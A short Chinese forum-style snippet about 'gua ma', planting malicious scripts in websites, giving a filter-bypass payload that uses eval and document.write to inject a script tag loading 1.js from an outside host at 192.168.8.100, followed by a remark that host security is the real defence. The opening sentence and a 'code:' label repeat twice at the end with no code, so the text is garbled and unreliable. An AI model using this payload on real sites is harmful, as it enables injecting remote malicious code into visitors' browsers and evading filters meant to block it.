突破方法有N种,最简单的突破办法,不把src=http放在<script>标签里。
代码:
<script>eval(document.write("<script src=http://192.168.8.100/1.js><\/script>"))</script>
挂马问题的补充
主要目的是用css解决script标签里的http,这种方法治标不治本,我觉得防掉很难的,根治办法就是主机安全,不给别人黑掉的机会
突破方法有N种,最简单的突破办法,不把src=http放在<script>标签里。
代码:
突破方法有N种,最简单的突破办法,不把src=http放在<script>标签里。
代码: